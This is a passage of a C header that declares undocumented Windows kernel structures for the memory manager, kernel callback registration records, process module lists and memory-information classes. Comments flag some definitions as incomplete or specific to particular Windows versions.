VOID* SessionViewVa;\n struct _EPROCESS* VadsProcess;\n ULONG Type : 2;\n } u1;\n union {\n struct _SUBSECTION* Subsection;\n ULONG SubsectionType : 1;\n } u2;\n union {\n struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES SystemCacheAttributes;\n ULONGLONG AllAttributes; //Since W11\n ULONGLONG SectionOffset;\n } u3;\n} MI_REVERSE_VIEW_MAP, * PMI_REVERSE_VIEW_MAP; /* size: 0x0028 */\n\ntypedef struct _RTL_BALANCED_NODE {\n union\n {\n struct _RTL_BALANCED_NODE* Children[2];\n struct\n {\n struct _RTL_BALANCED_NODE* Left;\n struct _RTL_BALANCED_NODE* Right;\n };\n };\n union\n {\n UCHAR Red : 1;\n UCHAR Balance : 2;\n ULONG_PTR ParentValue;\n };\n} RTL_BALANCED_NODE, * PRTL_BALANCED_NODE;\n\ntypedef struct _SEGMENT {\n\n struct _CONTROL_AREA* ControlArea;\n unsigned long TotalNumberOfPtes;\n SEGMENT_FLAGS SegmentFlags;\n ULONG_PTR NumberOfCommittedPages;\n ULONG_PTR SizeOfSegment;\n\n union {\n struct _MMEXTEND_INFO* ExtendInfo;\n void* BasedAddress;\n } u1;\n\n EX_PUSH_LOCK SegmentLock;\n\n union {\n union {\n ULONG_PTR ImageCommitment;\n ULONG CreatingProcessId;\n };\n } u2;\n\n union {\n union {\n struct _MI_SECTION_IMAGE_INFORMATION* ImageInformation;\n void* FirstMappedVa;\n };\n } u3;\n\n struct _MMPTE* PrototypePte;\n\n} SEGMENT, * PSEGMENT; /* size: 0x0048 */\n\ntypedef struct _CONTROL_AREA_COMPAT {\n\n SEGMENT* Segment;\n LIST_ENTRY ListHead;\n ULONG_PTR NumberOfSectionReferences;\n ULONG_PTR NumberOfPfnReferences;\n ULONG_PTR NumberOfMappedViews;\n ULONG_PTR NumberOfUserReferences;\n\n union {\n union {\n ULONG LongFlags;\n MMSECTION_FLAGS Flags;\n };\n } u;\n\n union {\n union {\n ULONG LongFlags;\n MMSECTION_FLAGS2 Flags;\n };\n } u1;\n\n EX_FAST_REF FilePointer;\n volatile LONG ControlAreaLock;\n ULONG ModifiedWriteCount;\n struct _MI_CONTROL_AREA_WAIT_BLOCK* WaitList;\n\n union\n {\n struct\n {\n union\n {\n ULONG NumberOfSystemCacheViews;\n ULONG ImageRelocationStartBit;\n };\n union\n {\n volatile LONG WritableUserReferences;\n struct // version dependent, this bitset is not valid for w11\n {\n unsigned long ImageRelocationSizeIn64k : 16; /* bit position: 0 */\n unsigned long LargePage : 1; /* bit position: 16 */\n unsigned long SystemImage : 1; /* bit position: 17 */\n unsigned long StrongCode : 2; /* bit position: 18 */\n unsigned long CantMove : 1; /* bit position: 20 */\n unsigned long BitMap : 2; /* bit position: 21 */\n unsigned long ImageActive : 1; /* bit position: 23 */\n };\n };\n union\n {\n ULONG FlushInProgressCount;\n ULONG NumberOfSubsections;\n struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub;\n };\n } e2;\n } u2;\n\n //\n // Incomplete definition, tail is version dependent.\n //\n\n} CONTROL_AREA_COMPAT, * PCONTROL_AREA_COMPAT;\n\n//\n// N.B. \n// Only valid for Win10.\n// Change between Win10 versions.\n//\ntypedef struct _MMVAD_SHORT {\n union\n {\n struct\n {\n struct _MMVAD_SHORT* NextVad;\n void* ExtraCreateInfo;\n };\n struct _RTL_BALANCED_NODE VadNode;\n };\n\n ULONG StartingVpn;\n ULONG EndingVpn;\n UCHAR StartingVpnHigh;\n UCHAR EndingVpnHigh;\n UCHAR CommitChargeHigh;\n UCHAR SpareNT64VadUChar;\n LONG ReferenceCount;\n EX_PUSH_LOCK PushLock;\n\n ULONG LongFlags;\n ULONG LongFlags1;\n\n struct _MI_VAD_EVENT_BLOCK* EventList;\n\n} MMVAD_SHORT, * PMMVAD_SHORT; /* size: 0x0040 */\n\ntypedef struct _MI_VAD_SEQUENTIAL_INFO {\n\n struct {\n#if defined(_AMD64_)\n ULONG_PTR Length : 12; /* bit position: 0 */\n ULONG_PTR Vpn : 52; /* bit position: 12 */\n#else\n ULONG Length : 11; /* bit position: 0 */\n ULONG Vpn : 21; /* bit position: 11 */\n#endif\n };\n\n} MI_VAD_SEQUENTIAL_INFO, * PMI_VAD_SEQUENTIAL_INFO;\n\n//\n// N.B. \n// Only valid for Win10.\n// Flags meanings change between Win10 versions.\n//\ntypedef struct _MMVAD_FLAGS {\n struct\n {\n ULONG VadType : 3; /* bit position: 0 */\n ULONG Protection : 5; /* bit position: 3 */\n ULONG PreferredNode : 6; /* bit position: 8 */\n ULONG PrivateMemory : 1; /* bit position: 14 */\n ULONG PrivateFixup : 1; /* bit position: 15 */\n ULONG Enclave : 1; /* bit position: 16 */\n ULONG PageSize64K : 1; /* bit position: 17 */\n ULONG RfgControlStack : 1; /* bit position: 18 */\n ULONG Spare : 8; /* bit position: 19 */\n ULONG NoChange : 1; /* bit position: 27 */\n ULONG ManySubsections : 1; /* bit position: 28 */\n ULONG DeleteInProgress : 1; /* bit position: 29 */\n ULONG LockContended : 1; /* bit position: 30 */\n ULONG Lock : 1; /* bit position: 31 */\n };\n} MMVAD_FLAGS, * PMMVAD_FLAGS; /* size: 0x0004 */\n\n//\n// N.B. \n// Only valid for Win10.\n// Flags meanings change between Win10 versions.\n//\ntypedef struct _MMVAD_FLAGS1 {\n struct\n {\n ULONG CommitCharge : 31; /* bit position: 0 */\n ULONG MemCommit : 1; /* bit position: 31 */\n };\n} MMVAD_FLAGS1, * PMMVAD_FLAGS1; /* size: 0x0004 */\n\n//\n// N.B. \n// Only valid for Win10.\n// Flags meanings change between Win10 versions.\n//\ntypedef struct _MMVAD_FLAGS2 {\n struct\n {\n ULONG FileOffset : 24; /* bit position: 0 */\n ULONG Large : 1; /* bit position: 24 */\n ULONG TrimBehind : 1; /* bit position: 25 */\n ULONG Inherit : 1; /* bit position: 26 */\n ULONG NoValidationNeeded : 1; /* bit position: 27 */\n ULONG PrivateDemandZero : 1; /* bit position: 28 */\n ULONG Spare : 3; /* bit position: 29 */\n };\n} MMVAD_FLAGS2, * PMMVAD_FLAGS2; /* size: 0x0004 */\n\ntypedef struct _MMVAD {\n\n struct _MMVAD_SHORT Core;\n\n union\n {\n union\n {\n ULONG LongFlags2;\n volatile struct _MMVAD_FLAGS2 VadFlags2;\n };\n } u2;\n\n struct _SUBSECTION* Subsection;\n struct _MMPTE* FirstPrototypePte;\n struct _MMPTE* LastContiguousPte;\n LIST_ENTRY ViewLinks;\n struct _EPROCESS* VadsProcess;\n\n union\n {\n union\n {\n struct _MI_VAD_SEQUENTIAL_INFO SequentialVa;\n struct _MMEXTEND_INFO* ExtendedInfo;\n };\n } u4;\n\n FILE_OBJECT* FileObject;\n\n} MMVAD, * PMMVAD; /* size: 0x0088 */\n\ntypedef struct _MMVIEW {\n ULONGLONG Entry;\n union {\n ULONGLONG Writable : 1;\n struct _CONTROL_AREA* ControlArea; \n };\n LIST_ENTRY ViewLinks; \n PVOID SessionViewVa;\n ULONG SessionId;\n} MMVIEW, *PMMVIEW;\n\ntypedef struct _MI_IMAGE_ENTRY_IN_SESSION {\n LIST_ENTRY Link;\n PVOID Address;\n\n //\n // Incomplete and incorrect.\n //\n\n} MI_IMAGE_ENTRY_IN_SESSION, * PMI_IMAGE_ENTRY_IN_SESSION;\n\ntypedef struct _SUBSECTION_COMPAT {\n\n struct _CONTROL_AREA* ControlArea;\n struct _MMPTE* SubsectionBase;\n struct _SUBSECTION* NextSubsection;\n\n //\n // Incomplete definition.\n //\n\n} SUBSECTION_COMPAT, * PSUBSECTION_COMPAT;\n\n//\n// This is Windows 10 only Section Object definition.\n// \n// N.B. It completely differs from anything else.\n//\ntypedef struct _SECTION_COMPAT {\n\n RTL_BALANCED_NODE SectionNode;\n ULONG_PTR StartingVpn;\n ULONG_PTR EndingVpn;\n\n union {\n union {\n struct _CONTROL_AREA* ControlArea;\n struct _FILE_OBJECT* FileObject;\n struct {\n ULONG_PTR RemoteImageFileObject : 1; /* bit position: 0 */\n ULONG_PTR RemoteDataFileObject : 1; /* bit position: 1 */\n };\n };\n } u1;\n\n ULONG_PTR SizeOfSection;\n\n union {\n ULONG LongFlags;\n MMSECTION_FLAGS Flags;\n } u;\n\n struct {\n ULONG InitialPageProtection : 12; /* bit position: 0 */\n ULONG SessionId : 19; /* bit position: 12 */\n ULONG NoValidationNeeded : 1; /* bit position: 31 */\n };\n\n} SECTION_COMPAT, * PSECTION_COMPAT; /* size: 0x0040 */\n\n/*\n* MM END\n*/\n\n/*\n* Configuration Manager control vector\n*/\ntypedef struct _CM_SYSTEM_CONTROL_VECTOR_V1 {\n PWSTR KeyPath;\n PWSTR ValueName;\n PVOID Buffer;\n PULONG BufferLength;\n PULONG Type;\n} CM_SYSTEM_CONTROL_VECTOR_V1, * PCM_SYSTEM_CONTROL_VECTOR_V1;\n\n//\n// Since Windows 10 RS4\n//\ntypedef struct _CM_SYSTEM_CONTROL_VECTOR_V2 {\n PWSTR KeyPath;\n PWSTR ValueName;\n PVOID Buffer;\n PULONG BufferLength;\n PULONG Type;\n ULONG Flags; //0 or 1 depends on flag from LOADER_PARAMETER_BLOCK attached hives\n ULONG Spare0;\n} CM_SYSTEM_CONTROL_VECTOR_V2, * PCM_SYSTEM_CONTROL_VECTOR_V2;\n\n/*\n** Callbacks START\n*/\n\ntypedef NTSTATUS(*PEX_CALLBACK_FUNCTION) (\n IN PVOID CallbackContext,\n IN PVOID Argument1,\n IN PVOID Argument2\n );\n\ntypedef VOID(NTAPI* PEX_HOST_NOTIFICATION) (\n _In_ ULONG NotificationType,\n _In_opt_ PVOID Context);\n\ntypedef struct _EX_EXTENSION_INFORMATION_V1 {\n USHORT Id;\n USHORT Version;\n USHORT FunctionCount;\n} EX_EXTENSION_INFORMATION_V1, * PEX_EXTENSION_INFORMATION_V1;\n\ntypedef struct _EX_EXTENSION_VERSION {\n USHORT MajorVersion;\n USHORT MinorVersion;\n} EX_EXTENSION_VERSION, * PEX_EXTENSION_VERSION;\n\ntypedef struct _EX_EXTENSION_INFORMATION_V2 {\n USHORT Id;\n EX_EXTENSION_VERSION Version;\n USHORT FunctionCount;\n} EX_EXTENSION_INFORMATION_V2, * PEX_EXTENSION_INFORMATION_V2;\n\ntypedef struct _EX_HOST_TABLE {\n EX_EXTENSION_INFORMATION_V2 HostInformation;\n PVOID FunctionTable; //calbacks\n} EX_HOST_TABLE, * PEX_HOST_TABLE;\n\ntypedef struct _EX_HOST_PARAMS {\n EX_EXTENSION_INFORMATION_V1 HostInformation;\n POOL_TYPE PoolType;\n PVOID HostTable;\n PVOID NotificationRoutine;\n PVOID NotificationContext;\n} EX_HOST_PARAMS, * PEX_HOST_PARAMS;\n\ntypedef struct _EX_HOST_ENTRY_V1 {\n LIST_ENTRY ListEntry;\n LONG RefCounter;\n EX_HOST_PARAMS HostParameters;\n EX_RUNDOWN_REF RundownProtection;\n EX_PUSH_LOCK PushLock;\n PVOID FunctionTable; //callbacks\n ULONG Flags;\n} EX_HOST_ENTRY_V1, * PEX_HOST_ENTRY_V1;\n\ntypedef struct _EX_HOST_ENTRY_V2 {\n LIST_ENTRY ListEntry;\n EX_EXTENSION_INFORMATION_V2 HostInformation;\n ULONG64 RefCounter;\n EX_PUSH_LOCK PushLock;\n PEX_HOST_TABLE HostTablesPtr;\n USHORT HostTablesCount;\n PEX_HOST_TABLE CurrentHostTableEntry; //only set when an extension registers\n PVOID NotificationRoutine;\n PVOID NotificationContext;\n EX_EXTENSION_VERSION ExtensionVersion;\n EX_RUNDOWN_REF RundownProtection;\n PVOID FunctionTable;\n USHORT ExtensionTableFunctionCount;\n ULONG Pad;\n ULONG Flags;\n EX_HOST_TABLE HostTables[1];\n} EX_HOST_ENTRY_V2, * PEX_HOST_ENTRY_V2;\n\ntypedef struct _EX_EXTENSION_REGISTRATION {\n EX_EXTENSION_INFORMATION_V1 Information;\n PVOID FunctionTable;\n PVOID* HostTable;\n PDRIVER_OBJECT DriverObject;\n} EX_EXTENSION_REGISTRATION, * PEX_EXTENSION_REGISTRATION;\n\ntypedef struct _EX_CALLBACK {\n EX_FAST_REF RoutineBlock;\n} EX_CALLBACK, *PEX_CALLBACK;\n\ntypedef struct _EX_CALLBACK_ROUTINE_BLOCK {\n EX_RUNDOWN_REF RundownProtect;\n PVOID Function; //PEX_CALLBACK_FUNCTION\n PVOID Context;\n} EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;\n\ntypedef struct _KBUGCHECK_CALLBACK_RECORD {\n LIST_ENTRY Entry;\n PVOID CallbackRoutine;\n PVOID Buffer;\n ULONG Length;\n PUCHAR Component;\n ULONG_PTR Checksum;\n UCHAR State;\n} KBUGCHECK_CALLBACK_RECORD, *PKBUGCHECK_CALLBACK_RECORD;\n\ntypedef enum _KBUGCHECK_CALLBACK_REASON {\n KbCallbackInvalid,\n KbCallbackReserved1,\n KbCallbackSecondaryDumpData,\n KbCallbackDumpIo,\n KbCallbackAddPages,\n KbCallbackSecondaryMultiPartDumpData,\n KbCallbackRemovePages,\n KbCallbackTriageDumpData\n} KBUGCHECK_CALLBACK_REASON;\n\ntypedef struct _KBUGCHECK_REASON_CALLBACK_RECORD {\n LIST_ENTRY Entry;\n PVOID CallbackRoutine;\n PUCHAR Component;\n ULONG_PTR Checksum;\n KBUGCHECK_CALLBACK_REASON Reason;\n UCHAR State;\n} KBUGCHECK_REASON_CALLBACK_RECORD, *PKBUGCHECK_REASON_CALLBACK_RECORD;\n\ntypedef struct _CM_CALLBACK_CONTEXT_BLOCK {\n LIST_ENTRY CallbackListEntry;\n LONG PreCallListHead;\n LARGE_INTEGER Cookie;\n PVOID CallerContext; \n PEX_CALLBACK_FUNCTION Function;\n UNICODE_STRING Altitude;\n LIST_ENTRY ObjectContextListHead;\n} CM_CALLBACK_CONTEXT_BLOCK, *PCM_CALLBACK_CONTEXT_BLOCK;\n\ntypedef struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION {\n struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION *Next;\n PVOID CallbackRoutine; //PSE_LOGON_SESSION_TERMINATED_ROUTINE\n} SEP_LOGON_SESSION_TERMINATED_NOTIFICATION, *PSEP_LOGON_SESSION_TERMINATED_NOTIFICATION;\n\ntypedef struct _NOTIFICATION_PACKET {\n LIST_ENTRY ListEntry;\n PVOID DriverObject; //PDRIVER_OBJECT\n PVOID NotificationRoutine; //PDRIVER_FS_NOTIFICATION\n} NOTIFICATION_PACKET, *PNOTIFICATION_PACKET;\n\ntypedef struct _SHUTDOWN_PACKET {\n LIST_ENTRY ListEntry;\n PVOID DeviceObject; //PDEVICE_OBJECT\n} SHUTDOWN_PACKET, *PSHUTDOWN_PACKET;\n\n#define EX_CALLBACK_SIGNATURE 'llaC'\n\ntypedef struct _CALLBACK_OBJECT {\n ULONG Signature;\n KSPIN_LOCK Lock;\n LIST_ENTRY RegisteredCallbacks;\n BOOLEAN AllowMultipleCallbacks;\n UCHAR reserved[3];\n} CALLBACK_OBJECT, *PCALLBACK_OBJECT;\n\n// Since 8.1\ntypedef struct _CALLBACK_OBJECT_V2 {\n ULONG Signature;\n KSPIN_LOCK Lock;\n LIST_ENTRY RegisteredCallbacks;\n BOOLEAN AllowMultipleCallbacks;\n LIST_ENTRY ExpCallbackList;\n} CALLBACK_OBJECT_V2, * PCALLBACK_OBJECT_V2;\n\ntypedef struct _CALLBACK_REGISTRATION {\n LIST_ENTRY Link;\n PCALLBACK_OBJECT CallbackObject;\n PVOID CallbackFunction; //PCALLBACK_FUNCTION\n PVOID CallbackContext;\n ULONG Busy;\n BOOLEAN UnregisterWaiting;\n} CALLBACK_REGISTRATION, *PCALLBACK_REGISTRATION;\n\ntypedef ULONG OB_OPERATION;\n\n#define OB_OPERATION_HANDLE_CREATE 0x00000001\n#define OB_OPERATION_HANDLE_DUPLICATE 0x00000002\n\ntypedef struct _OB_CALLBACK_CONTEXT_BLOCK {\n LIST_ENTRY CallbackListEntry;\n OB_OPERATION Operations;\n ULONG Flags;\n struct _OB_REGISTRATION* Registration;\n POBJECT_TYPE ObjectType;\n PVOID PreCallback;\n PVOID PostCallback;\n EX_RUNDOWN_REF RundownReference;\n} OB_CALLBACK_CONTEXT_BLOCK, *POB_CALLBACK_CONTEXT_BLOCK;\n\ntypedef struct _OB_REGISTRATION {\n USHORT Version;\n USHORT RegistrationCount;\n PVOID RegistrationContext;\n UNICODE_STRING Altitude;\n OB_CALLBACK_CONTEXT_BLOCK* CallbackContext;\n} OB_REGISTRATION, * POB_REGISTRATION;\n\n#define PO_POWER_SETTINGS_REGISTRATION_TAG 'teSP'\n\ntypedef struct _POP_POWER_SETTING_REGISTRATION_V1 {\n LIST_ENTRY Link;\n ULONG Tag;\n PVOID CallbackThread; //PKTHREAD\n UCHAR UnregisterOnReturn;\n UCHAR UnregisterPending;\n GUID Guid;\n PVOID LastValue; //PPOP_POWER_SETTING_VALUE\n PVOID Callback;\n PVOID Context;\n PDEVICE_OBJECT DeviceObject;\n} POP_POWER_SETTING_REGISTRATION_V1, *PPOP_POWER_SETTING_REGISTRATION_V1;\n\n//\n// WARNING: this structure definition is incomplete. \n// Tail is incorrect/incomplete for newest Win10 versions.\n//\ntypedef struct _POP_POWER_SETTING_REGISTRATION_V2 {\n LIST_ENTRY Link;\n ULONG Tag;\n PVOID CallbackThread; //PKTHREAD \n UCHAR UnregisterOnReturn;\n UCHAR UnregisterPending;\n GUID Guid;\n GUID Guid2;\n PVOID LastValue; //PPOP_POWER_SETTING_VALUE\n PVOID Callback;\n PVOID Context;\n PDEVICE_OBJECT DeviceObject;\n} POP_POWER_SETTING_REGISTRATION_V2, *PPOP_POWER_SETTING_REGISTRATION_V2;\n\ntypedef struct _RTL_CALLBACK_REGISTER {\n ULONG Flags;\n EX_RUNDOWN_REF RundownReference;\n PVOID DebugPrintCallback;\n LIST_ENTRY ListEntry;\n} RTL_CALLBACK_REGISTER, *PRTL_CALLBACK_REGISTER;\n\ntypedef\nVOID\n(*PPO_COALESCING_CALLBACK) (\n _In_ ULONG Reason,\n _In_ PDEVICE_OBJECT DeviceObject,\n _In_ PVOID Context);\n\ntypedef struct _PO_COALESCING_CALLBACK_V1 {\n EX_PUSH_LOCK PushLock;\n PVOID CoalescingCallback;\n PVOID SelfPtr;\n PPO_COALESCING_CALLBACK Callback;\n BOOLEAN ClientOrServer;\n PVOID Context;\n} PO_COALESCING_CALLBACK_V1, * PPO_COALESCING_CALLBACK_V1;\n\ntypedef struct _PO_COALESCING_CALLBACK_V2 {\n EX_PUSH_LOCK PushLock;\n PVOID CoalescingCallback;\n PVOID SelfPtr;\n PPO_COALESCING_CALLBACK Callback;\n BOOLEAN ClientOrServer;\n PVOID Context;\n LIST_ENTRY Link;\n EX_CALLBACK ExCallback;\n} PO_COALESCING_CALLBACK_V2, * PPO_COALESCING_CALLBACK_V2;\n\ntypedef\nBOOLEAN\n(*PNMI_CALLBACK)(\n __in_opt PVOID Context,\n __in BOOLEAN Handled\n );\n\ntypedef struct _KNMI_HANDLER_CALLBACK {\n struct _KNMI_HANDLER_CALLBACK* Next;\n PNMI_CALLBACK Callback;\n PVOID Context;\n PVOID Handle;\n} KNMI_HANDLER_CALLBACK, * PKNMI_HANDLER_CALLBACK;\n\ntypedef\nNTSTATUS\n(NTAPI* SILO_MONITOR_CREATE_CALLBACK)(\n _In_ PESILO Silo\n );\n\ntypedef\nVOID\n(NTAPI* SILO_MONITOR_TERMINATE_CALLBACK)(\n _In_ PESILO Silo\n );\n\n#define SILO_MONITOR_REGISTRATION_VERSION (1)\n\ntypedef struct _SERVER_SILO_MONITOR {\n LIST_ENTRY ListEntry;\n UCHAR Version;\n BOOLEAN MonitorHost;\n BOOLEAN MonitorExistingSilos;\n UCHAR Reserved[5];\n SILO_MONITOR_CREATE_CALLBACK CreateCallback;\n SILO_MONITOR_TERMINATE_CALLBACK TerminateCallback;\n union {\n PUNICODE_STRING DriverObjectName;\n PUNICODE_STRING ComponentName;\n };\n} SERVER_SILO_MONITOR, * PSERVER_SILO_MONITOR;\n\n//\n// Errata Manager\n//\ntypedef struct _EMP_CALLBACK_DB_RECORD {\n GUID CallbackId;\n PVOID CallbackFunc;\n LONG_PTR CallbackFuncReference;\n PVOID Context;\n SINGLE_LIST_ENTRY List;\n SINGLE_LIST_ENTRY CallbackDependencyListHead;\n ULONG NumberOfStrings;\n ULONG NumberOfNumerics;\n ULONG NumberOfEntries;\n struct _EMP_ENTRY_DB_RECORD* EntryList[1];\n} EMP_CALLBACK_DB_RECORD, * PEMP_CALLBACK_DB_RECORD;\n\ntypedef struct _EMP_CALLBACK_LIST_ENTRY {\n EMP_CALLBACK_DB_RECORD* CallbackRecord;\n SINGLE_LIST_ENTRY CallbackListEntry;\n} EMP_CALLBACK_LIST_ENTRY, * PEMP_CALLBACK_LIST_ENTRY;\n\ntypedef enum _IO_NOTIFICATION_EVENT_CATEGORY {\n EventCategoryReserved,\n EventCategoryHardwareProfileChange,\n EventCategoryDeviceInterfaceChange,\n EventCategoryTargetDeviceChange\n} IO_NOTIFICATION_EVENT_CATEGORY;\n\ntypedef\nNTSTATUS\n(*PDRIVER_NOTIFICATION_CALLBACK_ROUTINE) (\n IN PVOID NotificationStructure,\n IN PVOID Context\n );\n\ntypedef struct _KGUARDED_MUTEX {\n LONG Count;\n PKTHREAD Owner;\n ULONG Contention;\n KEVENT Event;\n union {\n struct {\n SHORT KernelApcDisable;\n SHORT SpecialApcDisable;\n };\n\n ULONG CombinedApcDisable;\n };\n\n} KGUARDED_MUTEX, * PKGUARDED_MUTEX;\n\ntypedef struct _DEVICE_CLASS_NOTIFY_ENTRY {\n\n // \n // Header entries \n // \n\n LIST_ENTRY ListEntry;\n IO_NOTIFICATION_EVENT_CATEGORY EventCategory;\n ULONG SessionId;\n HANDLE SessionHandle;\n PDRIVER_NOTIFICATION_CALLBACK_ROUTINE CallbackRoutine;\n PVOID Context;\n PDRIVER_OBJECT DriverObject;\n USHORT RefCount;\n BOOLEAN Unregistered;\n PKGUARDED_MUTEX Lock;\n PERESOURCE EntryLock;\n // \n // ClassGuid - the guid of the device class we are interested in \n // \n\n GUID ClassGuid;\n\n} DEVICE_CLASS_NOTIFY_ENTRY, * PDEVICE_CLASS_NOTIFY_ENTRY;\n\n/*\n** Callbacks END\n*/\n\n/*\n* NTQSI Modules START\n*/\n\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION {\n HANDLE Section;\n PVOID MappedBase;\n PVOID ImageBase;\n ULONG ImageSize;\n ULONG Flags;\n USHORT LoadOrderIndex;\n USHORT InitOrderIndex;\n USHORT LoadCount;\n USHORT OffsetToFileName;\n UCHAR FullPathName[256];\n} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;\n\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION_EX {\n USHORT NextOffset;\n RTL_PROCESS_MODULE_INFORMATION BaseInfo;\n ULONG ImageChecksum;\n ULONG TimeDateStamp;\n PVOID DefaultBase;\n} RTL_PROCESS_MODULE_INFORMATION_EX, *PRTL_PROCESS_MODULE_INFORMATION_EX;\n\ntypedef struct _RTL_PROCESS_MODULES {\n ULONG NumberOfModules;\n RTL_PROCESS_MODULE_INFORMATION Modules[1];\n} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;\n\n/*\n*\tNTQSI Modules END\n*/\n\n/*\n** Virtual Memory START\n*/\n\ntypedef enum _MEMORY_INFORMATION_CLASS {\n MemoryBasicInformation = 0,\n MemoryWorkingSetInformation,\n MemoryMappedFilenameInformation,\n MemoryRegionInformation,\n MemoryWorkingSetExInformation,\n MemorySharedCommitInformation,\n MemoryImageInformation,\n MemoryRegionInformationEx,\n MemoryPrivilegedBasicInformation,\n MemoryEnclaveImageInformation,\n MemoryBasicInformationCapped,\n MemoryPhysicalContiguityInformation,\n MemoryBadInformation,\n MemoryBadInformationAllProcesses,\n MaxMemoryInfoClass\n} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;\n\ntypedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS {\n VmPrefetchInformation,\n VmPagePriorityInformation,\n VmCfgCallTargetInformation,\n VmPageDirtyStateInformation\n} VIRTUAL_MEMORY_INFORMATION_CLASS;\n\ntypedef struct _MEMORY_REGION_INFORMATION {\n PVOID AllocationBase;\n ULONG AllocationProtect;\n union\n {\n ULONG RegionType;\n struct\n {\n ULONG Private : 1;\n ULONG MappedDataFile : 1;\n ULONG MappedImage : 1;\n ULONG MappedPageFile : 1;\n ULONG MappedPhysical : 1;\n ULONG DirectMapped : 1;\n ULONG SoftwareEnclave : 1;\n ULONG PageSize64K : 1;\n ULONG Reserved : 24;\n };\n };\n SIZE_T RegionSize;\n SIZE_T CommitSize;\n} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION;\n\ntypedef struct _MEMORY_REGION_INFORMATION_V2 {\n PVOID AllocationBase;\n ULONG AllocationProtect;\n union\n {\n ULONG RegionType;\n struct\n {\n ULONG Private : 1;\n ULONG MappedDataFile : 1;\n ULONG MappedImage : 1;\n ULONG MappedPageFile : 1;\n ULONG MappedPhysical : 1;\n ULONG DirectMapped : 1;\n ULONG SoftwareEnclave : 1; // RS3\n ULONG PageSize64K : 1;\n ULONG Reserved : 24;\n };\n };\n SIZE_T RegionSize;\n SIZE_T CommitSize;\n ULONG_PTR PartitionId; // 19H1\n} MEMORY_REGION_INFORMATION_V2, * PMEMORY_REGION_INFORMATION_V2;\n\ntypedef struct _MEMORY_REGION_INFORMATION_V3 {\n PVOID AllocationBase;\n ULONG AllocationProtect;\n union\n {\n ULONG RegionType;\n struct\n {\n ULONG Private : 1;\n ULONG MappedDataFile : 1;\n ULONG MappedImage : 1;\n ULONG MappedPageFile : 1;\n ULONG MappedPhysical : 1;\n ULONG DirectMapped : 1;\n ULONG SoftwareEnclave : 1; // RS3\n ULONG PageSize64K : 1;\n ULONG PlaceholderReservation : 1; // RS4\n ULONG MappedAwe : 1; // 21H1\n ULONG MappedWriteWatch : 1;\n ULONG PageSizeLarge : 1;\n ULONG PageSizeHuge : 1;\n ULONG Reserved : 19;\n };\n };\n SIZE_T RegionSize;\n SIZE_T CommitSize;\n ULONG_PTR PartitionId; // 19H1\n ULONG_PTR NodePreference; // 20H1\n} MEMORY_REGION_INFORMATION_V3, * PMEMORY_REGION_INFORMATION_V3;\n\ntypedef struct _MEMORY_RANGE_ENTRY {\n PVOID VirtualAddress;\n SIZE_T NumberOfBytes;\n} MEMORY_RANGE_ENTRY, *PMEMORY_RANGE_ENTRY;\n\ntypedef struct _MEMORY_IMAGE_INFORMATION {\n PVOID ImageBase;\n SIZE_T SizeOfImage;\n union\n {\n ULONG ImageFlags;\n struct\n {\n ULONG ImagePartialMap : 1;\n ULONG ImageNotExecutable : 1;\n ULONG ImageSigningLevel : 4; // RS3\n ULONG ImageExtensionPresent : 1; // 24H2\n ULONG Reserved : 25;\n };\n };\n} MEMORY_IMAGE_INFORMATION, * PMEMORY_IMAGE_INFORMATION;\n\ntypedef struct _MEMORY_ENCLAVE_IMAGE_INFORMATION {\n MEMORY_IMAGE_INFORMATION ImageInfo;\n UCHAR UniqueID[32];\n UCHAR AuthorID[32];\n} MEMORY_ENCLAVE_IMAGE_INFORMATION, * PMEMORY_ENCLAVE_IMAGE_INFORMATION;\n\ntypedef struct _MEMORY_WORKING_SET_BLOCK {\n ULONG_PTR Protection : 5;\n ULONG_PTR ShareCount : 3;\n ULONG_PTR Shared : 1;\n ULONG_PTR Node : 3;\n#ifdef _WIN64\n ULONG_PTR VirtualPage : 52;\n#else\n ULONG VirtualPage : 20;\n#endif\n} MEMORY_WORKING_SET_BLOCK, * PMEMORY_WORKING_SET_BLOCK;\n\ntypedef struct _MEMORY_WORKING_SET_INFORMATION {\n ULONG_PTR NumberOfEntries;\n _Field_size_(NumberOfEntries) MEMORY_WORKING_SET_BLOCK WorkingSetInfo[1];\n} MEMORY_WORKING_SET_INFORMATION, * PMEMORY_WORKING_SET_INFORMATION;\n\ntypedef struct _MEMORY_WORKING_SET_EX_BLOCK {\n union {\n struct {\n ULONG_PTR Valid : 1;\n ULONG_PTR ShareCount : 3;\n ULONG_PTR Win32Protection : 11;\n ULONG_PTR Shared : 1;\n ULONG_PTR Node : 6;\n ULONG_PTR Locked : 1;\n ULONG_PTR LargePage : 1;\n ULONG_PTR Priority : 3;\n ULONG_PTR Reserved : 3;\n ULONG_PTR SharedOriginal : 1;\n ULONG_PTR Bad : 1;\n ULONG_PTR Win32GraphicsProtection : 4;\n#ifdef _WIN64\n ULONG_PTR ReservedUlong : 28;\n#endif\n };\n struct {\n ULONG_PTR Valid : 1;\n ULONG_PTR Reserved0 : 14;\n ULONG_PTR Shared : 1;\n ULONG_PTR Reserved1 : 5;\n ULONG_PTR PageTable : 1;\n ULONG_PTR Location : 2;\n ULONG_PTR Priority : 3;\n ULONG_PTR ModifiedList : 1;\n ULONG_PTR Reserved2 : 2;\n ULONG_PTR SharedOriginal : 1;\n ULONG_PTR Bad : 1;\n#ifdef _WIN64\n ULONG_PTR ReservedUlong : 32;\n#endif\n } Invalid;\n };\n} MEMORY_WORKING_SET_EX_BLOCK, * PMEMORY_WORKING_SET_EX_BLOCK;\n\ntypedef struct _MEMORY_WORKING_SET_EX_INFORMATION {\n PVOID VirtualAddress;\n union {\n MEMORY_WORKING_SET_EX_BLOCK VirtualAttributes;\n ULONG_PTR Long;\n } u1;\n} MEMORY_WORKING_SET_EX_INFORMATION, * PMEMORY_WORKING_SET_EX_INFORMATION;\n\n#define MM_ZERO_ACCESS 0 // this value is not used.\n#define 